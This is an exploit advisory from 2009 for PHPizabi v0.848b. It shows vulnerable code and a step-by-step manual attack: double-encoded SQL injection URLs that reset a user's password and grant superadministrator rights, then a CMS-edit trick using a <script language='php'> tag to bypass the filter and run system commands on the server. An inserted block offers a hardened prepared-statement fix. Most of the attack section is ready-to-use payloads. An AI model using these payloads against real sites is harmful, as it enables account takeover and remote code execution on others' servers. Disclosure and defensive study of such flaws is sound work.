Mar 24, 2009 (vulners.com, SECURITYVULNS:DOC:21520)

PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)
by Nine:Situations:Group::bookoo

our site: http://retrogod.altervista.org/
software site: http://www.phpizabi.net/

vulnerability:
sql injection in /theme/default/proc.inc.php

<?php

    function bufferProcParse($buffer) {
        global $CONF;

        $tpl = new template;
        $tpl -> LoadThis($buffer);
        // HANDLE POSTED NOTEPAD DATA

        ///////////////////////////////////////////////////////
        // $_GET["notepad_body"] is URL-decoded a second time and then
        // concatenated straight into the UPDATE statement.
        if (isset($_GET["notepad_body"])) {
            myQ("UPDATE `[x]users` SET `notepad_body` =
                '".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'");
            me("flush");
        }
        // ... rest of the function not reproduced in the advisory
    }

note urldecode() …
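A hardened replacement for the notepad update, added here as an example and not PHPizabi's own code. It assumes a mysqli connection in $db, a plain `users` table in place of `[x]users`, and the me() helper seen in the snippet above; the user-supplied body is bound as a parameter instead of being decoded again and spliced into the query.

```php
<?php
// Added example (not PHPizabi code): hardened notepad update.
// Assumptions: $db is a mysqli connection, the table is `users`,
// and me("id") returns the current user's numeric id as in the advisory.
function saveNotepadBody(mysqli $db, int $userId, string $body): bool
{
    // PHP has already URL-decoded $_GET/$_POST values; a second urldecode()
    // is what turns a double-encoded %2527 into a quote after any input
    // filtering has run. So: no urldecode(), and the value never becomes
    // part of the SQL text; it is bound as a parameter.
    $stmt = $db->prepare("UPDATE `users` SET `notepad_body` = ? WHERE `id` = ?");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param("si", $body, $userId);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// A state-changing action should be a POST, not a GET, so it cannot be
// triggered by simply following a crafted link like the ones in the advisory.
if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["notepad_body"])) {
    if (saveNotepadBody($db, (int) me("id"), $_POST["notepad_body"])) {
        me("flush");
    }
}
```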

exploitation, manual:

injection urls:

change username and password of an existing user:
[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%2527/*

grant yourself admin rights:
[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username = 'bookoo'/*
which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/*

navigate:

http://host/path_to_phpizabi/?L=admin.index

boom !

now go to:

http://host/path_to_phpizabi/?L=admin.cms.edit&id={cms.file}

use this opening and closing tag style, example:

<script language="php">
system("ls -la");
</script>

(it is always available, see: http://www.php.net/manual/en/language.basic-syntax.phpmode.php)
because of that preg_replace() in /modules/admin/cms/edit.php :


if (isset($_POST["Submit"])) {
    if ($handle = fopen("modules/cms/{$_GET["id"]}.php", "w")) {

        // Only the <?php / <? / ?> / <% / %> forms are stripped; the
        // <script language="php"> form is not matched by this pattern,
        // and the result is written into a .php file.
        $body =
            "<?php if (!defined(\"CORE_STRAP\")) die(); ?>\n"
            .preg_replace('#(<\\?.*\\?>)|(<%.*%>)|<\\?php|<\\?|\\?>|<%|%>#si',
                NULL, stripslashes($_POST["body"][0]))
            ."\n<!-- Edited by ".me("username")." on "
            .date($CONF["LOCALE_HEADER_DATE_TIME"])." -->";

        fwrite($handle, $body);
        fclose($handle);
    }
}

which this tag style bypasses.

save changes and navigate:

http://host/path_to_phpizabi/?L=cms._cms_file_

to see the output…

now visit the log page:

http://192.168.0.1/phpizabi/?L=admin.logs.logs

original url: http://retrogod.altervista.org/9sg_phpizabi_848bc1.html